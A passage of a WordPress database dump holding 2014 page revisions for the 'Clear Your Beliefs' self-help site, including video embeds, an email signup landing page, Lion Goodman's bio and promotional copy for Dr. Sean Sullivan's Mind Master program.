(1410, 4194, '2014-09-08 18:59:25', '2014-09-08 23:59:25', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4" type="video/mp4">\r\n  <source src="movie.ogg" type="video/ogg">\r\nYour browser does not support the video tag.\r\n</video> </video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 18:59:25', '2014-09-08 23:59:25', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1412, 4194, '2014-09-08 19:05:34', '2014-09-09 00:05:34', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK%20Video%20final.mov" type="video/mp4">\r\nYour browser does not support the video tag.\r\n</video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 19:05:34', '2014-09-09 00:05:34', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1413, 4194, '2014-09-08 19:06:46', '2014-09-09 00:06:46', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK%20Video%20final.mov" type="video/mov">\r\nYour browser does not support the video tag.\r\n</video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 19:06:46', '2014-09-09 00:06:46', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1414, 4194, '2014-09-08 19:07:46', '2014-09-09 00:07:46', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK%20Video%20final.mov" type="video/quicktime">\r\nYour browser does not support the video tag.\r\n</video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 19:07:46', '2014-09-09 00:07:46', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1415, 4194, '2014-09-08 19:10:22', '2014-09-09 00:10:22', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo1.mp4" type="video/mp4">\r\n<source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo.webm" type="video/webm">\r\nYour browser does not support the video tag.\r\n</video>\r\n<h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2>\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 19:10:22', '2014-09-09 00:10:22', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1416, 4194, '2014-09-08 19:12:13', '2014-09-09 00:12:13', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="320" height="240" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo1.mp4" type="video/mp4">\r\n<source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo.webm" type="video/webm">\r\nYour browser does not support the video tag.\r\n</video>\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2-->\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-08 19:12:13', '2014-09-09 00:12:13', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1418, 4194, '2014-09-21 07:40:40', '2014-09-21 12:40:40', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 50%; margin: 0 auto;">\r\n <video width="640" height="360" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo1.mp4" type="video/mp4">\r\n<source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo.webm" type="video/webm">\r\nYour browser does not support the video tag.\r\n</video>\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2-->\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-21 07:40:40', '2014-09-21 12:40:40', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1419, 4194, '2014-09-21 07:41:21', '2014-09-21 12:41:21', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 30%; margin: 0 auto;">\r\n <video width="640" height="360" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo1.mp4" type="video/mp4">\r\n<source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo.webm" type="video/webm">\r\nYour browser does not support the video tag.\r\n</video>\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2-->\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-21 07:41:21', '2014-09-21 12:41:21', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1420, 4194, '2014-09-21 07:41:53', '2014-09-21 12:41:53', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 70%; margin: 0 auto;">\r\n <video width="640" height="360" controls>\r\n  <source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo1.mp4" type="video/mp4">\r\n<source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo.webm" type="video/webm">\r\nYour browser does not support the video tag.\r\n</video>\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2-->\r\n</div>\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-09-21 07:41:53', '2014-09-21 12:41:53', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1421, 4194, '2014-09-21 14:58:27', '2014-09-21 19:58:27', '<div id="main">\r\n<div id="logo"><img src="http://beliefcloset.com/cyb/wp-content/themes/clearyourbeliefs/images/cyb-header.jpg" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD THE FREE</h2>\r\n<h2>eBOOK</h2>\r\n<img class="aligncenter  wp-image-433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="120" height="155" />\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="1" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n<div id="mindmaster_img"><img class="aligncenter  wp-image-1445" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/logo-globe.jpg" alt="logo-globe" width="123" height="132" /></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n\r\n&nbsp;\r\n<h3>How and Why It Works</h3>\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a>Click HERE to Learn More</a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'publish', 'closed', 'open', '', 'clear-your-beliefs', '', '', '2014-09-27 11:16:01', '2014-09-27 16:16:01', '', 0, 'http://clearyourbeliefs.com/?page_id=1421', 0, 'page', '', 0),
(1428, 4194, '2014-09-21 15:22:47', '2014-09-21 20:22:47', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish \r\nwith \r\nClear Your Beliefs </h3>\r\n<ul>\r\n<li>Release hurt and pain from the past\r\n</li><li>\r\nClear resistance to taking action\r\n</li><li>\r\nOpen to new possibilities\r\n</li><li>\r\nEliminate blocks to manifestation\r\n</li><li>\r\nFind your true purpose\r\n</li><li>\r\nDelete what’s been holding you back\r\n</li><li>\r\nChange your personality style\r\n</li><li>\r\nOpen to deeper, more profound love\r\n</li><li>\r\nRecognize your spiritual nature\r\n</li><li>\r\nBecome less reactive, more calm\r\n</li><li>\r\nRediscover the source of your personal power\r\n</li></ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n<li>Beliefs are the major cause of upset and unhappiness\r\n\r\nCYB clears beliefs at the core of the psyche, where they live \r\n</li><li>\r\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\r\n</li><li>\r\nYou take charge and decide what you want to believe\r\n</li><li>\r\nYou’re guided gently, step-by-step, through the entire process \r\n</li><li>\r\nYou decide how far to go, and what changes to make\r\n</li></ul>\r\n</div>\r\n</div>\r\n            	                    \r\n                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:22:47', '2014-09-21 20:22:47', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1427, 4194, '2014-09-21 15:18:58', '2014-09-21 20:18:58', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish \r\nwith \r\nClear Your Beliefs </h3>\r\n<ul>\r\n<li>Release hurt and pain from the past\r\n</li><li>\r\nClear resistance to taking action\r\n</li><li>\r\nOpen to new possibilities\r\n</li><li>\r\nEliminate blocks to manifestation\r\n</li><li>\r\nFind your true purpose\r\n</li><li>\r\nDelete what’s been holding you back\r\n</li><li>\r\nChange your personality style\r\n</li><li>\r\nOpen to deeper, more profound love\r\n</li><li>\r\nRecognize your spiritual nature\r\n</li><li>\r\nBecome less reactive, more calm\r\n</li><li>\r\nRediscover the source of your personal power\r\n</li></ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>         You commit one hour each day for 21 total days of retraining your brain. It&#8217;s fine to take days or weekends off to fit your schedule.</p>\r\n<p>The promise is that by the end of your 21-day program you&#8217;ve learned and practiced all the psychological tools and skills, and also implemented all the habits necessary to master your personal goal.</p>\r\n<p>Dr. Sean&#8217;s unscripted, direct to camera videos are uncommonly personally revealing&#8211;especially in the world of professional psychology.</p>\r\n<p>Marta Wegorzewska, a Ph.D. candidate in Developmental and Stem Cell Biology, recently completed her 21-day program focused on mastering stress and anxiety. She says, &#8220;It was like having a psychologist who is your close friend sitting beside you every day. It&#8217;s so helpful and it works. I&#8217;m a scientist. I saw results.&#8221;</p>\r\n<p>You won&#8217;t set foot in a psychologist&#8217;s office or pay for a session. While <a href="http://www.drseansullivan.com/contact/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.drseansullivan.com'']);" target="_blank">Dr. Sean can be contacted</a> at his private psychotherapy practice in San Francisco, The 21-Day Mind Master Programs are accessed online or in apps.</p>\r\n<p>&#8220;The Mind Master is a do-it-yourself boot camp for your brain health and emotional intelligence. It&#8217;s important information to share,&#8221; Dr. Sean asserts. &#8220;I&#8217;ve always given the book away for free in the apps. I want it to be available to as many people as possible.&#8221;</p>\r\n<p>He&#8217;s well on his way. New York Jets Quarterback, Mark Sanchez, has commented, &#8220;Dr. Sullivan is a game changing new voice in the psychology of peak performance.&#8221;</p>\r\n<p>Mr. Sanchez is not the only one taking notice. In 2012, The Mind Master&#8217;s Map became the #1 Self Help Books app on iPad. You can now download the free <a href="https://itunes.apple.com/us/app/the-mind-masters-map-iphone/id446468278?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPhone app</span></a> and free <a href="https://itunes.apple.com/us/app/the-mind-masters-map/id441043981?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPad app</span></a> versions of the 21-day programs.</p>\r\n<p>The Mind Master is now also collaborating with health and wellness conscious organizations and employers</span></a> to deliver Group Mind Master Programs led by Dr. Sean. You can join us anytime in <a href="https://www.popexpert.com/mindmaster?code=mindmasterchallenge" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.popexpert.com'']);" target="_blank"><span class="textarea_link">The 21 Day Mind Master Health Challenge</span></a> presented with PopExpert. <a href="https://my.leadpages.net/leadbox/14158d173f72a2%3A1283fa00eb46dc/5718998062727168/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://my.leadpages.net'']);" target="_blank">Click here to be notified when The Mind Master Challenges launch.</a><script type="text/javascript" src="//my.leadpages.net/leadbox-680.js"></script></p>\r\n<p>If you&#8217;re ready to begin mastering you mind on your own right now, you can choose your <a href="http://themindmaster.com/new/featuring-prices2/"  target="_blank"><span class="textarea_link">21 Day Mind Master Program right here.</span></a></span></a></p>\r\n</div>\r\n</div>\r\n            	                    \r\n                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:18:58', '2014-09-21 20:18:58', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
